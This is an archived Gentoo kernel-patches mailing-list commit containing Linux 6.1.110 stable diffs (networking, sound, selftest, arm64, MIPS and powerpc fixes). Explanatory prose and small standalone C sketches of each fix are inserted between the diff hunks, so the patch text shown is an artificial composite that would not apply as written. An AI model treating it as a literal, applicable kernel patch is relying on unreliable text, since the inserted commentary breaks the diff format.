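The mm/memory.c change wraps the raw mapping loop so that a partial failure tears down whatever was already established before the error is returned: remap_pfn_range() takes no page references, and a caller seeing the error may free pages that are still mapped. A minimal sketch of that rollback-on-partial-failure shape, with invented stage names:

#include <stdio.h>

static int setup_stage(int i)
{
        return i < 3 ? 0 : -1;          /* pretend stage 3 fails */
}

static void teardown_stages(int upto)
{
        while (upto-- > 0)
                printf("  tearing down stage %d\n", upto);
}

/* If the loop fails part-way, the already-established part is undone
 * before the error is reported, so the caller never sees a half-built
 * state; the same idea as zapping the partial pfn mapping above. */
static int setup_all(int n)
{
        int i, err = 0;

        for (i = 0; i < n; i++) {
                err = setup_stage(i);
                if (err)
                        break;
                printf("  stage %d up\n", i);
        }
        if (!err)
                return 0;
        teardown_stages(i);
        return err;
}

int main(void)
{
        printf("setup_all(5) = %d\n", setup_all(5));
        return 0;
}
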
+diff --git a/net/ipv4/fou.c b/net/ipv4/fou.c
+index 7bcc933103e2d4..c29c976a259659 100644
+--- a/net/ipv4/fou.c
++++ b/net/ipv4/fou.c
+@@ -334,11 +334,11 @@ static struct sk_buff *gue_gro_receive(struct sock *sk,
+ 	struct gro_remcsum grc;
+ 	u8 proto;
+ 
++	skb_gro_remcsum_init(&grc);
++
+ 	if (!fou)
+ 		goto out;
+ 
+-	skb_gro_remcsum_init(&grc);
+-
+ 	off = skb_gro_offset(skb);
+ 	len = off + sizeof(*guehdr);
+ 
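
The fou.c fix hoists skb_gro_remcsum_init() above the first goto so the shared exit path never reads an uninitialized struct. The same shape in a small standalone sketch (struct and field names invented):

#include <stdio.h>
#include <string.h>

struct remcsum { long delta; int offset; };     /* stand-in for gro_remcsum */

static void remcsum_cleanup(struct remcsum *grc)
{
        /* Unwind only if something was recorded. */
        if (grc->offset)
                printf("undoing remcsum at offset %d\n", grc->offset);
}

/* Initialize state used by the common exit label before *any* branch
 * can jump there, so the bail-out path never sees garbage. */
static int parse(int have_ctx)
{
        struct remcsum grc;

        memset(&grc, 0, sizeof(grc));   /* moved above the first goto */
        if (!have_ctx)
                goto out;

        grc.offset = 14;                /* pretend work happened */
out:
        remcsum_cleanup(&grc);
        return have_ctx ? 0 : -1;
}

int main(void)
{
        printf("%d %d\n", parse(0), parse(1));
        return 0;
}
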
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index f001e15474029f..03c1500eae7e07 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -349,15 +349,21 @@ mptcp_pm_del_add_timer(struct mptcp_sock *msk,
+ {
+ 	struct mptcp_pm_add_entry *entry;
+ 	struct sock *sk = (struct sock *)msk;
++	struct timer_list *add_timer = NULL;
+ 
+ 	spin_lock_bh(&msk->pm.lock);
+ 	entry = mptcp_lookup_anno_list_by_saddr(msk, addr);
+-	if (entry && (!check_id || entry->addr.id == addr->id))
++	if (entry && (!check_id || entry->addr.id == addr->id)) {
+ 		entry->retrans_times = ADD_ADDR_RETRANS_MAX;
++		add_timer = &entry->add_timer;
++	}
++	if (!check_id && entry)
++		list_del(&entry->list);
+ 	spin_unlock_bh(&msk->pm.lock);
+ 
+-	if (entry && (!check_id || entry->addr.id == addr->id))
+-		sk_stop_timer_sync(sk, &entry->add_timer);
++	/* no lock, because sk_stop_timer_sync() is calling del_timer_sync() */
++	if (add_timer)
++		sk_stop_timer_sync(sk, add_timer);
+ 
+ 	return entry;
+ }
+@@ -1488,7 +1494,6 @@ static bool remove_anno_list_by_saddr(struct mptcp_sock *msk,
+ 
+ 	entry = mptcp_pm_del_add_timer(msk, addr, false);
+ 	if (entry) {
+-		list_del(&entry->list);
+ 		kfree(entry);
+ 		return true;
+ 	}
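
The MPTCP fix captures the timer pointer while holding the pm lock but calls sk_stop_timer_sync() only after dropping it, because a synchronous stop can wait for code that itself needs the lock. A pthread sketch of the same capture-under-lock pattern (compile with -lpthread; all names invented):

#include <stdio.h>
#include <pthread.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_t worker;
static int worker_live;

static void *work(void *arg)
{
        (void)arg;
        return NULL;
}

/* Decide *which* object to act on while holding the lock, but perform
 * the blocking synchronization (pthread_join here, sk_stop_timer_sync
 * in the hunk above) after dropping it. */
static void stop_worker(void)
{
        pthread_t victim;
        int found = 0;

        pthread_mutex_lock(&lock);
        if (worker_live) {
                victim = worker;        /* capture under the lock */
                worker_live = 0;
                found = 1;
        }
        pthread_mutex_unlock(&lock);

        if (found)
                pthread_join(victim, NULL);     /* blocking, lock dropped */
}

int main(void)
{
        pthread_mutex_lock(&lock);
        pthread_create(&worker, NULL, work, NULL);
        worker_live = 1;
        pthread_mutex_unlock(&lock);

        stop_worker();
        puts("worker stopped");
        return 0;
}
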
+diff --git a/net/netfilter/nft_socket.c b/net/netfilter/nft_socket.c
+index f28324fd8d7183..0f37738e4b26a4 100644
+--- a/net/netfilter/nft_socket.c
++++ b/net/netfilter/nft_socket.c
+@@ -110,13 +110,13 @@ static void nft_socket_eval(const struct nft_expr *expr,
+ 			*dest = READ_ONCE(sk->sk_mark);
+ 		} else {
+ 			regs->verdict.code = NFT_BREAK;
+-			return;
++			goto out_put_sk;
+ 		}
+ 		break;
+ 	case NFT_SOCKET_WILDCARD:
+ 		if (!sk_fullsock(sk)) {
+ 			regs->verdict.code = NFT_BREAK;
+-			return;
++			goto out_put_sk;
+ 		}
+ 		nft_socket_wildcard(pkt, regs, sk, dest);
+ 		break;
+@@ -124,7 +124,7 @@ static void nft_socket_eval(const struct nft_expr *expr,
+ 	case NFT_SOCKET_CGROUPV2:
+ 		if (!nft_sock_get_eval_cgroupv2(dest, sk, pkt, priv->level)) {
+ 			regs->verdict.code = NFT_BREAK;
+-			return;
++			goto out_put_sk;
+ 		}
+ 		break;
+ #endif
+@@ -133,6 +133,7 @@ static void nft_socket_eval(const struct nft_expr *expr,
+ 		regs->verdict.code = NFT_BREAK;
+ 	}
+ 
++out_put_sk:
+ 	if (sk != skb->sk)
+ 		sock_gen_put(sk);
+ }
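
The nft_socket change converts three early returns into jumps to a single out_put_sk label so the reference taken by the socket lookup is always dropped. A minimal refcount sketch of that funnel-through-one-label shape:

#include <stdio.h>

struct obj { int refs; };

static void put(struct obj *o)
{
        if (--o->refs == 0)
                printf("freed\n");
}

/* Every early-exit branch funnels through one label that drops the
 * reference taken at lookup time, instead of returning directly and
 * leaking it. */
static int eval(struct obj *o, int key)
{
        int ret;

        o->refs++;              /* reference taken by the lookup */
        switch (key) {
        case 0:
                ret = -1;
                goto out_put;   /* a bare return here would leak */
        case 1:
                ret = 0;
                break;
        default:
                ret = -1;
                break;
        }
out_put:
        put(o);
        return ret;
}

int main(void)
{
        struct obj o = { .refs = 1 };

        eval(&o, 0);
        eval(&o, 1);
        printf("refs = %d\n", o.refs);
        return 0;
}
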
+diff --git a/scripts/kconfig/merge_config.sh b/scripts/kconfig/merge_config.sh
+index e5b46980c22ae7..72da3b8d6f307b 100755
+--- a/scripts/kconfig/merge_config.sh
++++ b/scripts/kconfig/merge_config.sh
+@@ -160,6 +160,8 @@ for ORIG_MERGE_FILE in $MERGE_LIST ; do
+ 			sed -i "/$CFG[ =]/d" $MERGE_FILE
+ 		fi
+ 	done
++	# In case the previous file lacks a new line at the end
++	echo >> $TMP_FILE
+ 	cat $MERGE_FILE >> $TMP_FILE
+ done
+ 
+diff --git a/sound/soc/meson/axg-card.c b/sound/soc/meson/axg-card.c
+index cbbaa55d92a662..4553a1bb87d4a5 100644
+--- a/sound/soc/meson/axg-card.c
++++ b/sound/soc/meson/axg-card.c
+@@ -104,7 +104,7 @@ static int axg_card_add_tdm_loopback(struct snd_soc_card *card,
+ 				     int *index)
+ {
+ 	struct meson_card *priv = snd_soc_card_get_drvdata(card);
+-	struct snd_soc_dai_link *pad = &card->dai_link[*index];
++	struct snd_soc_dai_link *pad;
+ 	struct snd_soc_dai_link *lb;
+ 	struct snd_soc_dai_link_component *dlc;
+ 	int ret;
+@@ -114,6 +114,7 @@ static int axg_card_add_tdm_loopback(struct snd_soc_card *card,
+ 	if (ret)
+ 		return ret;
+ 
++	pad = &card->dai_link[*index];
+ 	lb = &card->dai_link[*index + 1];
+ 
+ 	lb->name = devm_kasprintf(card->dev, GFP_KERNEL, "%s-lb", pad->name);
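
The axg-card fix defers taking &card->dai_link[*index] until after meson_card_reallocate_links(), because the reallocation can move the array and leave the cached pointer dangling. The same hazard in plain C:

#include <stdio.h>
#include <stdlib.h>

/* A pointer into an array taken *before* a call that may realloc the
 * array can dangle; re-derive the pointer after any call that can
 * grow the storage. */
int main(void)
{
        int n = 4;
        int *arr = malloc(n * sizeof(*arr));
        int *grown;
        int *slot;

        arr[2] = 42;

        /* Wrong order: slot = &arr[2]; then grow; slot may dangle. */
        grown = realloc(arr, 4096 * sizeof(*arr));  /* may move the block */
        if (!grown) {
                free(arr);
                return 1;
        }
        arr = grown;
        slot = &arr[2];                             /* take it afterwards */

        printf("%d\n", *slot);
        free(arr);
        return 0;
}
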
+diff --git a/tools/testing/selftests/bpf/prog_tests/sockmap_listen.c b/tools/testing/selftests/bpf/prog_tests/sockmap_listen.c
+index 2cf0c7a3fe2326..cef5d35951711b 100644
+--- a/tools/testing/selftests/bpf/prog_tests/sockmap_listen.c
++++ b/tools/testing/selftests/bpf/prog_tests/sockmap_listen.c
+@@ -1909,7 +1909,7 @@ static void unix_inet_redir_to_connected(int family, int type, int sock_mapfd,
+ 	if (err)
+ 		return;
+ 
+-	if (socketpair(AF_UNIX, SOCK_DGRAM | SOCK_NONBLOCK, 0, sfd))
++	if (socketpair(AF_UNIX, type | SOCK_NONBLOCK, 0, sfd))
+ 		goto close_cli0;
+ 	c1 = sfd[0], p1 = sfd[1];
+ 
+@@ -1944,7 +1944,6 @@ static void unix_inet_redir_to_connected(int family, int type, int sock_mapfd,
+ close_cli0:
+ 	xclose(c0);
+ 	xclose(p0);
+-
+ }
+ 
+ static void unix_inet_skb_redir_to_connected(struct test_sockmap_listen *skel,
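
The selftest fix passes the caller's type through to socketpair() instead of hardcoding SOCK_DGRAM, so the SOCK_STREAM variants of the test actually exercise stream sockets. A standalone sketch of the parameterized helper:

#include <stdio.h>
#include <sys/socket.h>
#include <unistd.h>

/* The helper must honor its 'type' parameter when creating the
 * AF_UNIX pair, mirroring the one-line fix above. */
static int make_pair(int type, int sfd[2])
{
        return socketpair(AF_UNIX, type | SOCK_NONBLOCK, 0, sfd);
}

int main(void)
{
        int sfd[2];

        if (make_pair(SOCK_STREAM, sfd) == 0) {
                printf("stream pair: %d %d\n", sfd[0], sfd[1]);
                close(sfd[0]);
                close(sfd[1]);
        }
        if (make_pair(SOCK_DGRAM, sfd) == 0) {
                printf("dgram pair:  %d %d\n", sfd[0], sfd[1]);
                close(sfd[0]);
                close(sfd[1]);
        }
        return 0;
}
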


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-09-12 12:35 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-09-12 12:35 UTC (permalink / raw
  To: gentoo-commits

commit:     57035dc01a2c1fbdf35d763b5bdf0eda44657323
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Sep 12 12:35:27 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Sep 12 12:35:27 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=57035dc0

Linux patch 6.1.110

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1109_linux-6.1.110.patch | 7918 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 7922 insertions(+)

diff --git a/0000_README b/0000_README
index 2deab4a3..4375fd0f 100644
--- a/0000_README
+++ b/0000_README
@@ -483,6 +483,10 @@ Patch:  1108_linux-6.1.109.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.109
 
+Patch:  1109_linux-6.1.110.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.110
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1109_linux-6.1.110.patch b/1109_linux-6.1.110.patch
new file mode 100644
index 00000000..f0832cb1
--- /dev/null
+++ b/1109_linux-6.1.110.patch
@@ -0,0 +1,7918 @@
+diff --git a/Makefile b/Makefile
+index 59c1ac88c57d9..0e055579c7211 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 109
++SUBLEVEL = 110
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/include/asm/acpi.h b/arch/arm64/include/asm/acpi.h
+index bd68e1b7f29f3..702587fda70cf 100644
+--- a/arch/arm64/include/asm/acpi.h
++++ b/arch/arm64/include/asm/acpi.h
+@@ -97,6 +97,18 @@ static inline u32 get_acpi_id_for_cpu(unsigned int cpu)
+ 	return	acpi_cpu_get_madt_gicc(cpu)->uid;
+ }
+ 
++static inline int get_cpu_for_acpi_id(u32 uid)
++{
++	int cpu;
++
++	for (cpu = 0; cpu < nr_cpu_ids; cpu++)
++		if (acpi_cpu_get_madt_gicc(cpu) &&
++		    uid == get_acpi_id_for_cpu(cpu))
++			return cpu;
++
++	return -EINVAL;
++}
++
+ static inline void arch_fix_phys_package_id(int num, u32 slot) { }
+ void __init acpi_init_cpus(void);
+ int apei_claim_sea(struct pt_regs *regs);
+diff --git a/arch/arm64/kernel/acpi_numa.c b/arch/arm64/kernel/acpi_numa.c
+index ccbff21ce1faf..2465f291c7e17 100644
+--- a/arch/arm64/kernel/acpi_numa.c
++++ b/arch/arm64/kernel/acpi_numa.c
+@@ -34,17 +34,6 @@ int __init acpi_numa_get_nid(unsigned int cpu)
+ 	return acpi_early_node_map[cpu];
+ }
+ 
+-static inline int get_cpu_for_acpi_id(u32 uid)
+-{
+-	int cpu;
+-
+-	for (cpu = 0; cpu < nr_cpu_ids; cpu++)
+-		if (uid == get_acpi_id_for_cpu(cpu))
+-			return cpu;
+-
+-	return -EINVAL;
+-}
+-
+ static int __init acpi_parse_gicc_pxm(union acpi_subtable_headers *header,
+ 				      const unsigned long end)
+ {
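
The acpi change moves get_cpu_for_acpi_id() into the header and, more importantly, skips CPUs whose MADT GICC record is absent before comparing UIDs, instead of dereferencing blindly. A small sketch of the guarded lookup (the table contents are invented):

#include <stdio.h>

struct cpu { int present; unsigned uid; };

static struct cpu cpus[] = { {1, 7}, {0, 0}, {1, 42} };
#define NR ((int)(sizeof(cpus) / sizeof(cpus[0])))

/* Skip slots whose per-CPU record is absent (the NULL return from
 * acpi_cpu_get_madt_gicc() above) before comparing the UID. */
static int cpu_for_uid(unsigned uid)
{
        int cpu;

        for (cpu = 0; cpu < NR; cpu++)
                if (cpus[cpu].present && cpus[cpu].uid == uid)
                        return cpu;
        return -1;      /* -EINVAL in the kernel */
}

int main(void)
{
        printf("uid 42 -> cpu %d\n", cpu_for_uid(42));
        printf("uid  9 -> cpu %d\n", cpu_for_uid(9));
        return 0;
}
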
+diff --git a/arch/mips/kernel/cevt-r4k.c b/arch/mips/kernel/cevt-r4k.c
+index 32ec67c9ab67b..77028aa8c1073 100644
+--- a/arch/mips/kernel/cevt-r4k.c
++++ b/arch/mips/kernel/cevt-r4k.c
+@@ -303,13 +303,6 @@ int r4k_clockevent_init(void)
+ 	if (!c0_compare_int_usable())
+ 		return -ENXIO;
+ 
+-	/*
+-	 * With vectored interrupts things are getting platform specific.
+-	 * get_c0_compare_int is a hook to allow a platform to return the
+-	 * interrupt number of its liking.
+-	 */
+-	irq = get_c0_compare_int();
+-
+ 	cd = &per_cpu(mips_clockevent_device, cpu);
+ 
+ 	cd->name		= "MIPS";
+@@ -320,7 +313,6 @@ int r4k_clockevent_init(void)
+ 	min_delta		= calculate_min_delta();
+ 
+ 	cd->rating		= 300;
+-	cd->irq			= irq;
+ 	cd->cpumask		= cpumask_of(cpu);
+ 	cd->set_next_event	= mips_next_event;
+ 	cd->event_handler	= mips_event_handler;
+@@ -332,6 +324,13 @@ int r4k_clockevent_init(void)
+ 
+ 	cp0_timer_irq_installed = 1;
+ 
++	/*
++	 * With vectored interrupts things are getting platform specific.
++	 * get_c0_compare_int is a hook to allow a platform to return the
++	 * interrupt number of its liking.
++	 */
++	irq = get_c0_compare_int();
++
+ 	if (request_irq(irq, c0_compare_interrupt, flags, "timer",
+ 			c0_compare_interrupt))
+ 		pr_err("Failed to request irq %d (timer)\n", irq);
+diff --git a/arch/powerpc/include/asm/nohash/mmu-e500.h b/arch/powerpc/include/asm/nohash/mmu-e500.h
+index e43a418d3ccd0..9b5ba73d33d64 100644
+--- a/arch/powerpc/include/asm/nohash/mmu-e500.h
++++ b/arch/powerpc/include/asm/nohash/mmu-e500.h
+@@ -303,8 +303,7 @@ extern unsigned long linear_map_top;
+ extern int book3e_htw_mode;
+ 
+ #define PPC_HTW_NONE	0
+-#define PPC_HTW_IBM	1
+-#define PPC_HTW_E6500	2
++#define PPC_HTW_E6500	1
+ 
+ /*
+  * 64-bit booke platforms don't load the tlb in the tlb miss handler code.
+diff --git a/arch/powerpc/mm/nohash/Makefile b/arch/powerpc/mm/nohash/Makefile
+index f3894e79d5f70..24b445a5fcacc 100644
+--- a/arch/powerpc/mm/nohash/Makefile
++++ b/arch/powerpc/mm/nohash/Makefile
+@@ -3,7 +3,7 @@
+ ccflags-$(CONFIG_PPC64)	:= $(NO_MINIMAL_TOC)
+ 
+ obj-y				+= mmu_context.o tlb.o tlb_low.o kup.o
+-obj-$(CONFIG_PPC_BOOK3E_64)  	+= tlb_low_64e.o book3e_pgtable.o
++obj-$(CONFIG_PPC_BOOK3E_64)  	+= tlb_64e.o tlb_low_64e.o book3e_pgtable.o
+ obj-$(CONFIG_40x)		+= 40x.o
+ obj-$(CONFIG_44x)		+= 44x.o
+ obj-$(CONFIG_PPC_8xx)		+= 8xx.o
+diff --git a/arch/powerpc/mm/nohash/tlb.c b/arch/powerpc/mm/nohash/tlb.c
+index 2c15c86c70157..c0b643d30fcc2 100644
+--- a/arch/powerpc/mm/nohash/tlb.c
++++ b/arch/powerpc/mm/nohash/tlb.c
+@@ -110,28 +110,6 @@ struct mmu_psize_def mmu_psize_defs[MMU_PAGE_COUNT] = {
+ };
+ #endif
+ 
+-/* The variables below are currently only used on 64-bit Book3E
+- * though this will probably be made common with other nohash
+- * implementations at some point
+- */
+-#ifdef CONFIG_PPC64
+-
+-int mmu_pte_psize;		/* Page size used for PTE pages */
+-int mmu_vmemmap_psize;		/* Page size used for the virtual mem map */
+-int book3e_htw_mode;		/* HW tablewalk?  Value is PPC_HTW_* */
+-unsigned long linear_map_top;	/* Top of linear mapping */
+-
+-
+-/*
+- * Number of bytes to add to SPRN_SPRG_TLB_EXFRAME on crit/mcheck/debug
+- * exceptions.  This is used for bolted and e6500 TLB miss handlers which
+- * do not modify this SPRG in the TLB miss code; for other TLB miss handlers,
+- * this is set to zero.
+- */
+-int extlb_level_exc;
+-
+-#endif /* CONFIG_PPC64 */
+-
+ #ifdef CONFIG_PPC_E500
+ /* next_tlbcam_idx is used to round-robin tlbcam entry assignment */
+ DEFINE_PER_CPU(int, next_tlbcam_idx);
+@@ -361,381 +339,7 @@ void tlb_flush(struct mmu_gather *tlb)
+ 	flush_tlb_mm(tlb->mm);
+ }
+ 
+-/*
+- * Below are functions specific to the 64-bit variant of Book3E though that
+- * may change in the future
+- */
+-
+-#ifdef CONFIG_PPC64
+-
+-/*
+- * Handling of virtual linear page tables or indirect TLB entries
+- * flushing when PTE pages are freed
+- */
+-void tlb_flush_pgtable(struct mmu_gather *tlb, unsigned long address)
+-{
+-	int tsize = mmu_psize_defs[mmu_pte_psize].enc;
+-
+-	if (book3e_htw_mode != PPC_HTW_NONE) {
+-		unsigned long start = address & PMD_MASK;
+-		unsigned long end = address + PMD_SIZE;
+-		unsigned long size = 1UL << mmu_psize_defs[mmu_pte_psize].shift;
+-
+-		/* This isn't the most optimal, ideally we would factor out the
+-		 * while preempt & CPU mask mucking around, or even the IPI but
+-		 * it will do for now
+-		 */
+-		while (start < end) {
+-			__flush_tlb_page(tlb->mm, start, tsize, 1);
+-			start += size;
+-		}
+-	} else {
+-		unsigned long rmask = 0xf000000000000000ul;
+-		unsigned long rid = (address & rmask) | 0x1000000000000000ul;
+-		unsigned long vpte = address & ~rmask;
+-
+-		vpte = (vpte >> (PAGE_SHIFT - 3)) & ~0xffful;
+-		vpte |= rid;
+-		__flush_tlb_page(tlb->mm, vpte, tsize, 0);
+-	}
+-}
+-
+-static void __init setup_page_sizes(void)
+-{
+-	unsigned int tlb0cfg;
+-	unsigned int tlb0ps;
+-	unsigned int eptcfg;
+-	int i, psize;
+-
+-#ifdef CONFIG_PPC_E500
+-	unsigned int mmucfg = mfspr(SPRN_MMUCFG);
+-	int fsl_mmu = mmu_has_feature(MMU_FTR_TYPE_FSL_E);
+-
+-	if (fsl_mmu && (mmucfg & MMUCFG_MAVN) == MMUCFG_MAVN_V1) {
+-		unsigned int tlb1cfg = mfspr(SPRN_TLB1CFG);
+-		unsigned int min_pg, max_pg;
+-
+-		min_pg = (tlb1cfg & TLBnCFG_MINSIZE) >> TLBnCFG_MINSIZE_SHIFT;
+-		max_pg = (tlb1cfg & TLBnCFG_MAXSIZE) >> TLBnCFG_MAXSIZE_SHIFT;
+-
+-		for (psize = 0; psize < MMU_PAGE_COUNT; ++psize) {
+-			struct mmu_psize_def *def;
+-			unsigned int shift;
+-
+-			def = &mmu_psize_defs[psize];
+-			shift = def->shift;
+-
+-			if (shift == 0 || shift & 1)
+-				continue;
+-
+-			/* adjust to be in terms of 4^shift Kb */
+-			shift = (shift - 10) >> 1;
+-
+-			if ((shift >= min_pg) && (shift <= max_pg))
+-				def->flags |= MMU_PAGE_SIZE_DIRECT;
+-		}
+-
+-		goto out;
+-	}
+-
+-	if (fsl_mmu && (mmucfg & MMUCFG_MAVN) == MMUCFG_MAVN_V2) {
+-		u32 tlb1cfg, tlb1ps;
+-
+-		tlb0cfg = mfspr(SPRN_TLB0CFG);
+-		tlb1cfg = mfspr(SPRN_TLB1CFG);
+-		tlb1ps = mfspr(SPRN_TLB1PS);
+-		eptcfg = mfspr(SPRN_EPTCFG);
+-
+-		if ((tlb1cfg & TLBnCFG_IND) && (tlb0cfg & TLBnCFG_PT))
+-			book3e_htw_mode = PPC_HTW_E6500;
+-
+-		/*
+-		 * We expect 4K subpage size and unrestricted indirect size.
+-		 * The lack of a restriction on indirect size is a Freescale
+-		 * extension, indicated by PSn = 0 but SPSn != 0.
+-		 */
+-		if (eptcfg != 2)
+-			book3e_htw_mode = PPC_HTW_NONE;
+-
+-		for (psize = 0; psize < MMU_PAGE_COUNT; ++psize) {
+-			struct mmu_psize_def *def = &mmu_psize_defs[psize];
+-
+-			if (!def->shift)
+-				continue;
+-
+-			if (tlb1ps & (1U << (def->shift - 10))) {
+-				def->flags |= MMU_PAGE_SIZE_DIRECT;
+-
+-				if (book3e_htw_mode && psize == MMU_PAGE_2M)
+-					def->flags |= MMU_PAGE_SIZE_INDIRECT;
+-			}
+-		}
+-
+-		goto out;
+-	}
+-#endif
+-
+-	tlb0cfg = mfspr(SPRN_TLB0CFG);
+-	tlb0ps = mfspr(SPRN_TLB0PS);
+-	eptcfg = mfspr(SPRN_EPTCFG);
+-
+-	/* Look for supported direct sizes */
+-	for (psize = 0; psize < MMU_PAGE_COUNT; ++psize) {
+-		struct mmu_psize_def *def = &mmu_psize_defs[psize];
+-
+-		if (tlb0ps & (1U << (def->shift - 10)))
+-			def->flags |= MMU_PAGE_SIZE_DIRECT;
+-	}
+-
+-	/* Indirect page sizes supported ? */
+-	if ((tlb0cfg & TLBnCFG_IND) == 0 ||
+-	    (tlb0cfg & TLBnCFG_PT) == 0)
+-		goto out;
+-
+-	book3e_htw_mode = PPC_HTW_IBM;
+-
+-	/* Now, we only deal with one IND page size for each
+-	 * direct size. Hopefully all implementations today are
+-	 * unambiguous, but we might want to be careful in the
+-	 * future.
+-	 */
+-	for (i = 0; i < 3; i++) {
+-		unsigned int ps, sps;
+-
+-		sps = eptcfg & 0x1f;
+-		eptcfg >>= 5;
+-		ps = eptcfg & 0x1f;
+-		eptcfg >>= 5;
+-		if (!ps || !sps)
+-			continue;
+-		for (psize = 0; psize < MMU_PAGE_COUNT; psize++) {
+-			struct mmu_psize_def *def = &mmu_psize_defs[psize];
+-
+-			if (ps == (def->shift - 10))
+-				def->flags |= MMU_PAGE_SIZE_INDIRECT;
+-			if (sps == (def->shift - 10))
+-				def->ind = ps + 10;
+-		}
+-	}
+-
+-out:
+-	/* Cleanup array and print summary */
+-	pr_info("MMU: Supported page sizes\n");
+-	for (psize = 0; psize < MMU_PAGE_COUNT; ++psize) {
+-		struct mmu_psize_def *def = &mmu_psize_defs[psize];
+-		const char *__page_type_names[] = {
+-			"unsupported",
+-			"direct",
+-			"indirect",
+-			"direct & indirect"
+-		};
+-		if (def->flags == 0) {
+-			def->shift = 0;	
+-			continue;
+-		}
+-		pr_info("  %8ld KB as %s\n", 1ul << (def->shift - 10),
+-			__page_type_names[def->flags & 0x3]);
+-	}
+-}
+-
+-static void __init setup_mmu_htw(void)
+-{
+-	/*
+-	 * If we want to use HW tablewalk, enable it by patching the TLB miss
+-	 * handlers to branch to the one dedicated to it.
+-	 */
+-
+-	switch (book3e_htw_mode) {
+-	case PPC_HTW_IBM:
+-		patch_exception(0x1c0, exc_data_tlb_miss_htw_book3e);
+-		patch_exception(0x1e0, exc_instruction_tlb_miss_htw_book3e);
+-		break;
+-#ifdef CONFIG_PPC_E500
+-	case PPC_HTW_E6500:
+-		extlb_level_exc = EX_TLB_SIZE;
+-		patch_exception(0x1c0, exc_data_tlb_miss_e6500_book3e);
+-		patch_exception(0x1e0, exc_instruction_tlb_miss_e6500_book3e);
+-		break;
+-#endif
+-	}
+-	pr_info("MMU: Book3E HW tablewalk %s\n",
+-		book3e_htw_mode != PPC_HTW_NONE ? "enabled" : "not supported");
+-}
+-
+-/*
+- * Early initialization of the MMU TLB code
+- */
+-static void early_init_this_mmu(void)
+-{
+-	unsigned int mas4;
+-
+-	/* Set MAS4 based on page table setting */
+-
+-	mas4 = 0x4 << MAS4_WIMGED_SHIFT;
+-	switch (book3e_htw_mode) {
+-	case PPC_HTW_E6500:
+-		mas4 |= MAS4_INDD;
+-		mas4 |= BOOK3E_PAGESZ_2M << MAS4_TSIZED_SHIFT;
+-		mas4 |= MAS4_TLBSELD(1);
+-		mmu_pte_psize = MMU_PAGE_2M;
+-		break;
+-
+-	case PPC_HTW_IBM:
+-		mas4 |= MAS4_INDD;
+-		mas4 |=	BOOK3E_PAGESZ_1M << MAS4_TSIZED_SHIFT;
+-		mmu_pte_psize = MMU_PAGE_1M;
+-		break;
+-
+-	case PPC_HTW_NONE:
+-		mas4 |=	BOOK3E_PAGESZ_4K << MAS4_TSIZED_SHIFT;
+-		mmu_pte_psize = mmu_virtual_psize;
+-		break;
+-	}
+-	mtspr(SPRN_MAS4, mas4);
+-
+-#ifdef CONFIG_PPC_E500
+-	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
+-		unsigned int num_cams;
+-		bool map = true;
+-
+-		/* use a quarter of the TLBCAM for bolted linear map */
+-		num_cams = (mfspr(SPRN_TLB1CFG) & TLBnCFG_N_ENTRY) / 4;
+-
+-		/*
+-		 * Only do the mapping once per core, or else the
+-		 * transient mapping would cause problems.
+-		 */
+-#ifdef CONFIG_SMP
+-		if (hweight32(get_tensr()) > 1)
+-			map = false;
+-#endif
+-
+-		if (map)
+-			linear_map_top = map_mem_in_cams(linear_map_top,
+-							 num_cams, false, true);
+-	}
+-#endif
+-
+-	/* A sync won't hurt us after mucking around with
+-	 * the MMU configuration
+-	 */
+-	mb();
+-}
+-
+-static void __init early_init_mmu_global(void)
+-{
+-	/* XXX This should be decided at runtime based on supported
+-	 * page sizes in the TLB, but for now let's assume 16M is
+-	 * always there and a good fit (which it probably is)
+-	 *
+-	 * Freescale booke only supports 4K pages in TLB0, so use that.
+-	 */
+-	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E))
+-		mmu_vmemmap_psize = MMU_PAGE_4K;
+-	else
+-		mmu_vmemmap_psize = MMU_PAGE_16M;
+-
+-	/* XXX This code only checks for TLB 0 capabilities and doesn't
+-	 *     check what page size combos are supported by the HW. It
+-	 *     also doesn't handle the case where a separate array holds
+-	 *     the IND entries from the array loaded by the PT.
+-	 */
+-	/* Look for supported page sizes */
+-	setup_page_sizes();
+-
+-	/* Look for HW tablewalk support */
+-	setup_mmu_htw();
+-
+-#ifdef CONFIG_PPC_E500
+-	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
+-		if (book3e_htw_mode == PPC_HTW_NONE) {
+-			extlb_level_exc = EX_TLB_SIZE;
+-			patch_exception(0x1c0, exc_data_tlb_miss_bolted_book3e);
+-			patch_exception(0x1e0,
+-				exc_instruction_tlb_miss_bolted_book3e);
+-		}
+-	}
+-#endif
+-
+-	/* Set the global containing the top of the linear mapping
+-	 * for use by the TLB miss code
+-	 */
+-	linear_map_top = memblock_end_of_DRAM();
+-
+-	ioremap_bot = IOREMAP_BASE;
+-}
+-
+-static void __init early_mmu_set_memory_limit(void)
+-{
+-#ifdef CONFIG_PPC_E500
+-	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
+-		/*
+-		 * Limit memory so we dont have linear faults.
+-		 * Unlike memblock_set_current_limit, which limits
+-		 * memory available during early boot, this permanently
